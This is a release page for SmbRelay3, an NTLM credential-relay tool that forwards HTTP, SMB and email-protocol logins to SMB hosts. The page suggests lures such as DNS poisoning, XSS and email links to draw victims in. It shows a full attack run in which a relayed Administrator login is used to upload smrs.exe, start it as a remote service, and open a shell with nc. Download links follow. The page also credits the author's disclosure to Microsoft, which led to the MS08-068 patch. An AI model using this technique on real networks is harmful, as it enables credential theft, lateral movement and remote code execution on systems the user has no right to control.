Introduction
Most Windows networks still support insecure authentication schemes by default.
This is for example what happends with NTLM who is enable by default until lastest
Windows Vista.
NTLM allows users to reply incomming connections against third part systems, and
authenticate themselves without knowing the password. Therefore,
connecting to a
system with NTLM means that you can be owned.
This authentication scheme is used on a variety of protocols, like HTTP. There is
also a windows feature that allows your internet browser (iexplore) or the system
(explorer) to automatically send your credentials against a network server if the
server requires authentication.
If you are able to force remote users to connect to your system (HTTP or SMB) with
dns attacks (poisoning,..), social engineering, email link, msn http link, xss,
shutting down valid servers and getting the server ip address, or deploying some
kind of malicous
payload theorically, the network
belongs to you. To exploit those security flaws, we have developed a new security
tool named
SmbRelay 3 that at this time is able to relay both HTTP and SMB
authentication.
Smbrelay3 is the first public tool that allows those kinds of attacks. This
version also includes an small SMB library for creating crafted messages so, if
the incomming connection has Administrative privileges on the client computer, you
will automatically get a shell.

Currently the following attacks are implemented:
* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials
to another smb host.
* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials
to another windows computer.
* IMAP to SMB: Negotiate authentication with an email IMAP client and relay
credentials to another host.
* POP3 to SMB: Negotiate authentication with an email POP3 client and relay
credentials to another host.
* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer
and relay credentials.
* Psexec Module: If you already know username and password you can get a
shell to the remote computer. This psexec like tool works under win32 and linux
as do not use Microsoft API.
* Fake interface:Under linux, a new port 445 binding is done under a different
ip address. All packets sent to that interface will be replayed to the previously
authenticated system.
Details
If gathered credentials have administration privileges on the target system, under
those scenarios you will automatically get a remote shell to the target system.
There are also two additional features:
To allow the user to automatically get a remote shell smbrelay needs to send raw
smb messages to the SMB server. Thats why smbrelay3 implements its own smb library
for creating special crafted packets.

Smbrelay is able to send the following smb requests:
#define SMBCLOSE 0x04
#define SERVICEOPERATION 0x25
#define READANDX 0x2e
#define WRITEANDX 0x2f
#define FINDFIRST2 0x32
#define SESSIONSETUPANDX 0x73
#define TREECONNETANDX 0x75
#define NTCREATEANDX 0xa2
For more information just read the readme file
Attack Example:
C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81
SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - [email protected]
Website: http://www.tarasco.org
Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080
C:\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Special thanks goes to
Iñaki Lopez
for developing the NTLM library.
Update: A few months after delivering a copy of smbrelay3 to
Microsoft MSRC, they have released
MS08-068 security bulletin, limitating this vulnerability to be
exploited against the same workstation and under the same protocol. As the reflexion attack is fixed, you can still replay credentials to other domain servers or use different protocols. Enjoy :)
+
Download (Windows executable + Source code)
+
Browse source code
online
+
Paper Download Spanish Paper (Presented at
Lac0n security congress) with detailed information about how does NTLM works and how to exploit Windows authentication